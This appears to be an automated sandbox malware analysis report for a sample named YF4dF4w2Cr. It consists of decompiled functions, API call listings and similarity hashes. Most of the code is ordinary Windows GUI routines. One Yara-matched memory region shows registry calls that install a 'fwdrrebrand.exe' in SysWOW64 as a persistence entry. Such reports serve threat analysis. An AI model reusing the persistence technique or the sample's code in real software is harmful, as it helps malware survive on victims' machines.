                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: $C}q$F6.;$JN$ZGd
                  • API String ID: 1029625771-657663392
                  • Opcode ID: 725a2535bea74805b02b65e50c2839a8a37a945487a2bf795a7bec37c754f476
                  • Instruction ID: edfee69dcaea88f783ca42f08ffb998045923a6a4dcf9d16d30496c8d7e64946
                  • Opcode Fuzzy Hash: 725a2535bea74805b02b65e50c2839a8a37a945487a2bf795a7bec37c754f476
                  • Instruction Fuzzy Hash: 1061A8B4C55369CBEB208F81A9917CDBB70FB11304F6185C9D2A93B204DBB40A86CF95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E004128A9(void* __edx) {
                  				signed int _v8;
                  				void _v136;
                  				int _v140;
                  				int _v144;
                  				char _v148;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t21;
                  				unsigned int _t23;
                  				char* _t35;
                  				struct HBITMAP__* _t37;
                  				unsigned int _t40;
                  				signed short _t42;
                  				intOrPtr _t46;
                  				int _t47;
                  				unsigned int _t49;
                  				void* _t52;
                  				signed char* _t53;
                  				void* _t54;
                  				signed int _t58;
                  				intOrPtr _t59;
                  				void* _t60;
                  				signed int _t62;
                  				void* _t63;
                  				intOrPtr _t64;
                  				signed int _t66;
                  				signed int _t68;
                  
                  				_t52 = __edx;
                  				_t66 = _t68;
                  				_t21 =  *0x463404; // 0x18eab29f
                  				_v8 = _t21 ^ _t66;
                  				_push(_t60);
                  				_push(_t54);
                  				_t23 = GetMenuCheckMarkDimensions();
                  				_t47 = _t23;
                  				_t40 = _t23 >> 0x10;
                  				_v144 = _t47;
                  				_v140 = _t40;
                  				if(_t47 <= 4) {
                  					L3:
                  					E00406436(_t40, _t47, _t54, _t60, _t73);
                  				} else {
                  					_t73 = _t40 - 5;
                  					if(_t40 <= 5) {
                  						goto L3;
                  					}
                  				}
                  				if(_t47 > 0x20) {
                  					_t47 = 0x20;
                  					_v144 = _t47;
                  				}
                  				asm("cdq");
                  				_t62 = _t47 + 0xf >> 4;
                  				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
                  				if(_t58 > 0xc) {
                  					_t58 = 0xc;
                  				}
                  				if(_t40 > 0x20) {
                  					_t40 = 0x20;
                  					_v140 = _t40;
                  				}
                  				E00431160(_t58,  &_v136, 0xff, 0x80);
                  				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
                  				_t53 = 0x4514b4;
                  				_t63 = _t62 + _t62;
                  				_v148 = 5;
                  				do {
                  					_t42 = ( *_t53 & 0x000000ff) << _t58;
                  					_t53 =  &(_t53[1]);
                  					_t49 =  !_t42 & 0x0000ffff;
                  					 *_t35 = _t49 >> 8;
                  					 *(_t35 + 1) = _t49;
                  					_t35 = _t35 + _t63;
                  					_t15 =  &_v148;
                  					 *_t15 = _v148 - 1;
                  				} while ( *_t15 != 0);
                  				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
                  				_pop(_t59);
                  				_pop(_t64);
                  				 *0x466560 = _t37;
                  				_pop(_t46);
                  				if(_t37 == 0) {
                  					 *0x466560 = _t37;
                  				}
                  				return E00430650(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
                  			}

                  APIs
                  • GetMenuCheckMarkDimensions.USER32 ref: 004128C1
                  • _memset.LIBCMT ref: 00412939
                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0041299C
                  • LoadBitmapA.USER32 ref: 004129B4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                  • String ID:
                  • API String ID: 4271682439-3916222277
                  • Opcode ID: b5f77ca9ce8d0de09fb24572092bc98af35eea4ddacb5d1be8eaecbc8a1ea975
                  • Instruction ID: 38b95418af95e8854720099d7e8ddae421d8a6e1ae950d27b7bdda4e2e8a65fc
                  • Opcode Fuzzy Hash: b5f77ca9ce8d0de09fb24572092bc98af35eea4ddacb5d1be8eaecbc8a1ea975
                  • Instruction Fuzzy Hash: F6312971A002159FEB20CF299D85BE97BB4FB44304F4541BBF549E7292DB748D84CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E0040C509(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
                  				void _v20;
                  				int _t14;
                  				int _t18;
                  				intOrPtr* _t23;
                  				void* _t25;
                  
                  				if(E0040C354() == 0) {
                  					if(_a4 != 0x12340042) {
                  						L9:
                  						_t14 = 0;
                  						L10:
                  						return _t14;
                  					}
                  					_t23 = _a8;
                  					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                  						goto L9;
                  					} else {
                  						 *((intOrPtr*)(_t23 + 4)) = 0;
                  						 *((intOrPtr*)(_t23 + 8)) = 0;
                  						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
                  						_t18 = GetSystemMetrics(1);
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						 *(_t23 + 0x10) = _t18;
                  						 *((intOrPtr*)(_t23 + 0x24)) = 1;
                  						if( *_t23 >= 0x48) {
                  							E00433504(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
                  						}
                  						_t14 = 1;
                  						goto L10;
                  					}
                  				}
                  				return  *0x466328(_a4, _a8);
                  			}









                  APIs
                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0040C549
                  • GetSystemMetrics.USER32 ref: 0040C561
                  • GetSystemMetrics.USER32 ref: 0040C568
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: System$Metrics$InfoParameters
                  • String ID: B$DISPLAY
                  • API String ID: 3136151823-3316187204
                  • Opcode ID: 21211c0dfc0b0310e6e94eb9e5fcc5913642c798adf72206dc1ed171178922e0
                  • Instruction ID: 791c3770960fa488d4c8b65a8903be86f79acb93c7c19c9457816c0bfd0009e2
                  • Opcode Fuzzy Hash: 21211c0dfc0b0310e6e94eb9e5fcc5913642c798adf72206dc1ed171178922e0
                  • Instruction Fuzzy Hash: DC11C475500334FBDB119F658CC1A5BBBA8EF0A751F0441B2FD05BA186D2B4E940CBD9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 023ED779
                  • RegSetValueExW.ADVAPI32(?,023F2700,00000000,00000001,?,00000000), ref: 023ED79D
                  • RegCloseKey.ADVAPI32(?), ref: 023ED7A6
                  Strings
                  • fwdrrebrand, xrefs: 023ED795
                  • C:\Windows\SysWOW64\fwdrrebrand.exe, xrefs: 023ED736
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateValue
                  • String ID: C:\Windows\SysWOW64\fwdrrebrand.exe$fwdrrebrand
                  • API String ID: 1818849710-3855578920
                  • Opcode ID: 620721afb614bae5bed359364e2b11c5d85b1e85f282ba023500b6617eea7555
                  • Instruction ID: e81321cfd811bf7bf55a8a1a96964e7e81e9787219833f69bdc4d8cbc2120270
                  • Opcode Fuzzy Hash: 620721afb614bae5bed359364e2b11c5d85b1e85f282ba023500b6617eea7555
                  • Instruction Fuzzy Hash: DF11C0B5A40218FBEF605B98AC85F7B736EDB44750F500565FA0FD2181EB714D1886A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0042277C(void* __ecx, intOrPtr _a4) {
                  				struct HINSTANCE__* _t4;
                  				_Unknown_base(*)()* _t5;
                  				void* _t9;
                  				void* _t10;
                  
                  				_t10 = __ecx;
                  				_t4 = GetModuleHandleA("GDI32.DLL");
                  				_t9 = 0;
                  				_t5 = GetProcAddress(_t4, "SetLayout");
                  				if(_t5 == 0) {
                  					if(_a4 != 0) {
                  						_t9 = 0xffffffff;
                  						SetLastError(0x78);
                  					}
                  				} else {
                  					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                  				}
                  				return _t9;
                  			}








                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 0042278A
                  • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 00422798
                  • SetLastError.KERNEL32(00000078), ref: 004227B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$SetLayout
                  • API String ID: 4275029093-2147214759
                  • Opcode ID: e540bd1042b3f68eb9b6f0ed1f5cd4fb6be716e9388cfb093c8fcd2548240629
                  • Instruction ID: 395a0e9ebdf5a2e1b80e510cae3e67cf4d98a6f7501344e6daefd505b8f3eb0f
                  • Opcode Fuzzy Hash: e540bd1042b3f68eb9b6f0ed1f5cd4fb6be716e9388cfb093c8fcd2548240629
                  • Instruction Fuzzy Hash: 07E02B373002147B82111F66AD0890A7E56E7C5B723658133F925D3290CA7588418768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00435257(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				signed int _v8;
                  				intOrPtr _t11;
                  				intOrPtr* _t15;
                  				intOrPtr* _t19;
                  				void* _t23;
                  
                  				_t26 = __esi;
                  				_t25 = __edi;
                  				_t24 = __edx;
                  				_t11 =  *((intOrPtr*)( *_a4));
                  				if(_t11 == 0xe0434f4d) {
                  					__eflags =  *((intOrPtr*)(E00436178(_t23, __edx, __edi, __eflags) + 0x90));
                  					if(__eflags > 0) {
                  						_t15 = E00436178(_t23, __edx, __edi, __eflags) + 0x90;
                  						 *_t15 =  *_t15 - 1;
                  						__eflags =  *_t15;
                  					}
                  					goto L5;
                  				} else {
                  					_t32 = _t11 - 0xe06d7363;
                  					if(_t11 != 0xe06d7363) {
                  						L5:
                  						__eflags = 0;
                  						return 0;
                  					} else {
                  						 *(E00436178(_t23, __edx, __edi, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                  						_push(8);
                  						_push(0x45e1d0);
                  						E00431818(_t23, __edi, __esi);
                  						_t19 =  *((intOrPtr*)(E00436178(_t23, __edx, _t25, _t32) + 0x78));
                  						if(_t19 != 0) {
                  							_v8 = _v8 & 0x00000000;
                  							 *_t19();
                  							_v8 = 0xfffffffe;
                  						}
                  						return E0043185D(E0043BF7D(_t23, _t24, _t25, _t26));
                  					}
                  				}
                  			}









                  APIs
                  • __getptd.LIBCMT ref: 00435271
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 00435282
                  • __getptd.LIBCMT ref: 00435290
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: MOC$csm
                  • API String ID: 803148776-1389381023
                  • Opcode ID: f833f7341121851217e10f26a012840fe280062e9fc8dff470913a4d62912fc6
                  • Instruction ID: ce40cc71b876635b456ab49842eecf86f574a445523513ec0804e5d9cbf1e949
                  • Opcode Fuzzy Hash: f833f7341121851217e10f26a012840fe280062e9fc8dff470913a4d62912fc6
                  • Instruction Fuzzy Hash: 33E04F35500205AFCB60ABA5C446B6E33A4EB4E318F16A1E7E40CC7323C77CD850994A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E00422744(signed int __ecx) {
                  				_Unknown_base(*)()* _t3;
                  				signed int _t7;
                  				signed int _t8;
                  
                  				_t7 = __ecx;
                  				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                  				if(_t3 == 0) {
                  					_t8 = _t7 | 0xffffffff;
                  					SetLastError(0x78);
                  				} else {
                  					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                  				}
                  				return _t8;
                  			}







                  APIs
                  • GetModuleHandleA.KERNEL32(GDI32.DLL,?,00425A15), ref: 0042274E
                  • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0042275A
                  • SetLastError.KERNEL32(00000078), ref: 00422772
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressErrorHandleLastModuleProc
                  • String ID: GDI32.DLL$GetLayout
                  • API String ID: 4275029093-2396518106
                  • Opcode ID: b6a56586d83474ba617ffbc4177e26df6ea37e987274d3318c0e5c86094dc973
                  • Instruction ID: c3a8ff1e6a70369a334e9d65533ec26824e18546c235e0bade0a9994c07655bf
                  • Opcode Fuzzy Hash: b6a56586d83474ba617ffbc4177e26df6ea37e987274d3318c0e5c86094dc973
                  • Instruction Fuzzy Hash: 1AD0C232B442207BD2212F726D4DA163E80BB89BA33594661BC26E31D0CAA8CC008758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00424CB8(void* __ecx, void* __eflags, intOrPtr _a8) {
                  				signed int _v8;
                  				struct tagRECT _v24;
                  				signed int _t44;
                  				signed int _t48;
                  				signed int _t52;
                  				signed int _t57;
                  				void* _t64;
                  				signed int _t67;
                  				void* _t75;
                  				void* _t76;
                  				signed int _t78;
                  				void* _t80;
                  
                  				_t80 = __eflags;
                  				_t75 = __ecx;
                  				_v8 = E00412B38(__ecx);
                  				GetWindowRect( *(__ecx + 0x20),  &_v24);
                  				_t67 = GetSystemMetrics(0x21);
                  				_t78 = GetSystemMetrics(0x20);
                  				_t76 = E0040ED96(_t75, _t80);
                  				if((_v8 & 0x00001000) == 0) {
                  					L5:
                  					__eflags = _t76 - 0xa;
                  					if(_t76 < 0xa) {
                  						L7:
                  						__eflags = _t76 - 4;
                  						if(_t76 != 4) {
                  							L16:
                  							return _t76;
                  						}
                  						L8:
                  						__eflags = _v8 & 0x00000800;
                  						if((_v8 & 0x00000800) == 0) {
                  							InflateRect( &_v24,  ~_t78,  ~_t67);
                  							__eflags = _v8 & 0x00000200;
                  							if((_v8 & 0x00000200) == 0) {
                  								goto L16;
                  							}
                  							_t44 = _t76 - 4;
                  							__eflags = _t44;
                  							if(_t44 == 0) {
                  								L21:
                  								__eflags = _a8 - _v24.bottom;
                  								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
                  							}
                  							_t48 = _t44 - 9;
                  							__eflags = _t48;
                  							if(_t48 == 0) {
                  								__eflags = _a8 - _v24.top;
                  								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
                  							}
                  							_t52 = _t48 - 1;
                  							__eflags = _t52;
                  							if(_t52 == 0) {
                  								__eflags = _a8 - _v24.top;
                  								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
                  							}
                  							_t57 = _t52;
                  							__eflags = _t57;
                  							if(_t57 == 0) {
                  								__eflags = _a8 - _v24.bottom;
                  								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
                  							}
                  							__eflags = _t57 == 1;
                  							if(_t57 == 1) {
                  								goto L21;
                  							}
                  							goto L16;
                  						}
                  						_t64 = 2;
                  						return _t64;
                  					}
                  					__eflags = _t76 - 0x11;
                  					if(_t76 <= 0x11) {
                  						goto L8;
                  					}
                  					goto L7;
                  				}
                  				if(_t76 == 3) {
                  					_t76 = 2;
                  				}
                  				if(GetKeyState(2) >= 0) {
                  					goto L5;
                  				} else {
                  					return 0;
                  				}
                  			}
















                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetWindowRect.USER32 ref: 00424CD4
                  • GetSystemMetrics.USER32 ref: 00424CE2
                  • GetSystemMetrics.USER32 ref: 00424CE8
                  • GetKeyState.USER32(00000002), ref: 00424D08
                  • InflateRect.USER32(?,00000000,00000000), ref: 00424D3E
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsRectSystemWindow$InflateLongState
                  • String ID:
                  • API String ID: 2406722796-0
                  • Opcode ID: b7e1fb10cf98936029ff3779083299cd64c9a269c6d8fca835f4ba8cdf550397
                  • Instruction ID: e3ecd6cb329665b2cd8a2448089bf16f9698f38525433f5d73bdf6f6ead89f03
                  • Opcode Fuzzy Hash: b7e1fb10cf98936029ff3779083299cd64c9a269c6d8fca835f4ba8cdf550397
                  • Instruction Fuzzy Hash: F631F732B20128ABDB30DBA8F849AAF77A4EBC5394F954417D502D7180DA7CDD41C659
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00405112(intOrPtr __ecx, void* __eflags, struct tagRECT* _a4) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				void* __ebx;
                  				void* _t23;
                  				void* _t39;
                  				long _t41;
                  				void* _t45;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_v8 = __ecx;
                  				_t45 = E0040474E(__ecx);
                  				_t39 = E004045BE(0, _t45, 0);
                  				if(_t39 == 0 || _t39 == _v8) {
                  					_v12 = GetWindowLongA( *(_t45 + 0xe8), 0xffffffec);
                  					if(_t39 == 0 || (E00412B52(_v8) & 0x00000200) != 0 || (E00412B38(_v8) & 0x01000000) == 0) {
                  						_t41 = _v12 | 0x00000200;
                  					} else {
                  						_t41 = _v12 & 0xfffffdff;
                  					}
                  					if(_v12 == _t41) {
                  						goto L11;
                  					} else {
                  						RedrawWindow( *(_t45 + 0xe8), 0, 0, 0x81);
                  						SetWindowLongA( *(_t45 + 0xe8), 0xffffffec, _t41);
                  						SetWindowPos( *(_t45 + 0xe8), 0, 0, 0, 0, 0, 0x137);
                  						if(_a4 != 0) {
                  							GetClientRect( *(_t45 + 0xe8), _a4);
                  						}
                  						_t23 = 1;
                  					}
                  				} else {
                  					L11:
                  					_t23 = 0;
                  				}
                  				return _t23;
                  			}











                  APIs
                    • Part of subcall function 0040474E: GetParent.USER32(?), ref: 0040475A
                    • Part of subcall function 0040474E: GetParent.USER32(00000000), ref: 0040475D
                  • GetWindowLongA.USER32 ref: 00405147
                  • RedrawWindow.USER32(?,00000000,00000000,00000081), ref: 00405198
                  • SetWindowLongA.USER32 ref: 004051A7
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 004051BD
                  • GetClientRect.USER32 ref: 004051D1
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$LongParent$ClientRectRedraw
                  • String ID:
                  • API String ID: 556606033-0
                  • Opcode ID: 4ba79fdda7cda7382cc20deb3ffb3e4f90149cdee4478f17621874e7fee797b8
                  • Instruction ID: 7aaf3126d674e3e7048fbaf7b7e8ae3f530f56a6ff30dac5665c823baf7d5697
                  • Opcode Fuzzy Hash: 4ba79fdda7cda7382cc20deb3ffb3e4f90149cdee4478f17621874e7fee797b8
                  • Instruction Fuzzy Hash: F211D232900508FFDB206F65CC45FAFBA79EB81350F21463AF516BA1E0CA355D41CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E00408A69(void* __ecx, unsigned int _a4) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t20;
                  				void* _t21;
                  				void* _t23;
                  				void* _t27;
                  				void* _t33;
                  				void* _t35;
                  				struct HWND__* _t36;
                  
                  				_t28 = __ecx;
                  				_t35 = __ecx;
                  				if((E00412B38(__ecx) & 0x40000000) == 0) {
                  					_t28 = __ecx;
                  					_t27 = E0040F8D7(__ecx);
                  				} else {
                  					_t27 = __ecx;
                  				}
                  				_t38 = _t27;
                  				if(_t27 == 0) {
                  					E00406436(_t27, _t28, _t33, _t35, _t38);
                  				}
                  				if((_a4 & 0x0000000c) != 0) {
                  					_t23 = E00412C5B(_t27);
                  					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t27 == _t35) {
                  						SendMessageA( *(_t27 + 0x20), 0x86, 0, 0);
                  					} else {
                  						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0x00000200;
                  						SendMessageA( *(_t27 + 0x20), 0x86, 1, 0);
                  						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0xfffffdff;
                  					}
                  				}
                  				_push(5);
                  				_push(GetDesktopWindow());
                  				while(1) {
                  					_t20 = GetWindow();
                  					_t36 = _t20;
                  					if(_t36 == 0) {
                  						break;
                  					}
                  					_t21 = E00408105( *(_t27 + 0x20), _t36);
                  					__eflags = _t21;
                  					if(_t21 != 0) {
                  						SendMessageA(_t36, 0x36d, _a4, 0);
                  					}
                  					_push(2);
                  					_push(_t36);
                  				}
                  				return _t20;
                  			}















                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00408AD0
                  • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 00408AE7
                  • GetDesktopWindow.USER32 ref: 00408AEB
                  • SendMessageA.USER32(00000000,0000036D,0000000C,00000000), ref: 00408B0C
                  • GetWindow.USER32(00000000), ref: 00408B11
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSendWindow$DesktopLong
                  • String ID:
                  • API String ID: 2272707703-0
                  • Opcode ID: db1c326b4e3218c1e5cb1ae0b208da50d9e98377f96e91c78ba2f68c648b6619
                  • Instruction ID: d32bd3ced13832ff189fd8f6ba1fa6c44edaf74d9e9f2573400e8018fbc2a9f8
                  • Opcode Fuzzy Hash: db1c326b4e3218c1e5cb1ae0b208da50d9e98377f96e91c78ba2f68c648b6619
                  • Instruction Fuzzy Hash: 3B11D03130071577EB316B568E46F9B3A19AF40764F16403FBA82796D1CEF9D8018EAC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00406DB6(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                  				signed short _t24;
                  				unsigned int _t34;
                  				void* _t46;
                  
                  				_t46 = __ecx;
                  				if(IsWindow( *(__ecx + 0x20)) == 0) {
                  					 *(_t46 + 0xb0) = _a4;
                  					 *(_t46 + 0xb4) = _a8;
                  					 *(_t46 + 0xa8) = _a12;
                  					_t24 = _a16;
                  					 *(_t46 + 0xac) = _t24;
                  					return _t24;
                  				}
                  				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                  				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                  				if( *0x462630 >= 0x60000) {
                  					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
                  					 *(_t46 + 0xb0) = _t34 & 0x0000ffff;
                  					 *(_t46 + 0xb4) = _t34 >> 0x10;
                  				}
                  				return InvalidateRect( *(_t46 + 0x20), 0, 1);
                  			}







                  APIs
                  • IsWindow.USER32(?), ref: 00406DC1
                  • SendMessageA.USER32(?,00000420,00000000,?), ref: 00406DEC
                  • SendMessageA.USER32(?,0000041F,00000000,?), ref: 00406E05
                  • SendMessageA.USER32(?,0000043A,00000000,00000000), ref: 00406E1D
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00406E37
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateRectWindow
                  • String ID:
                  • API String ID: 3225880595-0
                  • Opcode ID: 8681fc28124b6b9a29a6d98b5f23533007bf2a326a10b3009479ffc3174121ec
                  • Instruction ID: 4717757c02217832fd9b412043661d7cdff3795e995a25a39b476dc6cc087278
                  • Opcode Fuzzy Hash: 8681fc28124b6b9a29a6d98b5f23533007bf2a326a10b3009479ffc3174121ec
                  • Instruction Fuzzy Hash: CD115EB5100318AFE7108F29CC84AB7B7E9FB44344F01452EF99AC2160D7B0AC50DB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042A16F(void* _a4, void* _a8) {
                  				void* _t7;
                  				DEVMODEA* _t8;
                  				struct HDC__* _t17;
                  				void* _t21;
                  				struct HDC__* _t25;
                  				signed short* _t28;
                  
                  				if(_a4 != 0) {
                  					_t7 = GlobalLock(_a4);
                  					_t21 = _a8;
                  					_t28 = _t7;
                  					if(_t21 == 0) {
                  						_t8 = 0;
                  					} else {
                  						_t8 = GlobalLock(_t21);
                  					}
                  					if(_t28 != 0) {
                  						_t25 = CreateDCA(_t28 + ( *_t28 & 0x0000ffff), _t28 + (_t28[1] & 0x0000ffff), _t28 + (_t28[2] & 0x0000ffff), _t8);
                  						GlobalUnlock(_a4);
